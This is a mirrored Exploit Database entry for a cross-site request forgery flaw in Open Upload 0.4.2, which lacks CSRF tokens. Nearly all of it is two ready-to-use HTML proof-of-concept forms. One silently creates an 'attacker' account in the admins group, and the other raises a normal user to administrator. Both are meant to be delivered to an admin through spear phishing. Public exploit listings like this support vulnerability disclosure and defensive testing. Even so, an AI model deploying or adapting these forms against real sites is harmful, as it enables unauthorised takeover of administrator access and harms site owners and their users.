Open Upload 0.4.2 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 16 阅读

• 作者： Vinesh Redkar
  日期： 2016-08-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40193/

• ================================================================================================================
  Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission
  ================================================================================================================
  # Exploit Title		: Open Upload 0.4.2 Remote Admin Add CSRF Exploit
  # Exploit Author	: Vinesh Redkar (@b0rn2pwn) 
  # Email		: vineshredkar89[at]gmail[d0t]com
  # Date: 21/07/2016
  # Vendor Homepage: http://openupload.sourceforge.net/
  # Software Link: https://sourceforge.net/projects/openupload/
  # Version: 0.4.2
  # Tested on: Windows 10 OS
   
  Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning
  that if an admin user can be tricked to visit a crafted URL created by
  attacker (via spear phishing/social engineering).
  
  Once exploited, the attacker can login as the admin using the username and the password he posted in the form.
  
  ======================CSRF POC (Adding New user with Admin Privileges)==================================
  CSRF PoC Code
  <html>
  <head>
  <title>Remote Admin Add CSRF Exploit</title>
  </head>
  <H2>Remote Admin Add CSRF Exploit by b0rn2pwn</H2>
  <body>
  <form action="http://127.0.0.1/openupload/index.php" method="POST">
  <input type="hidden" name="action" value="adminusers" />
  <input type="hidden" name="step" value="2" />
  <input type="hidden" name="adduserlogin" value="attacker" />
  <input type="hidden" name="adduserpassword" value="attacker" />
  <input type="hidden" name="adduserrepassword" value="attacker" />
  <input type="hidden" name="addusername" value="attacker" />
  <input type="hidden" name="adduseremail" value="attacker&#64;gmail&#46;com" />
  <input type="hidden" name="addusergroup" value="admins" />
  <input type="hidden" name="adduserlang" value="en" />
  <input type="hidden" name="adduseractive" value="1" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>
  
  ======================CSRF POC (Changing privileges from normal user to administer)==================================
  
  <html>
  <head>
  <title>Change privilege normal user to administer CSRF Exploit</title>
  </head>
  <H2>Change privilege normal user to administer CSRF Exploit by b0rn2pwn</H2>
  <body>
  <form action="http://127.0.0.1/openupload/index.php" method="POST">
  <input type="hidden" name="action" value="adminusers" />
  <input type="hidden" name="step" value="3" />
  <input type="hidden" name="login" value="normal user" />
  <input type="hidden" name="edituserpassword" value="" />
  <input type="hidden" name="edituserrepassword" value="" />
  <input type="hidden" name="editusername" value="normaluser" />
  <input type="hidden" name="edituseremail" value="normaluser&#64;gmail&#46;com" />
  <input type="hidden" name="editusergroup" value="admins" />
  <input type="hidden" name="edituserlang" value="en" />
  <input type="hidden" name="edituseractive" value="1" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>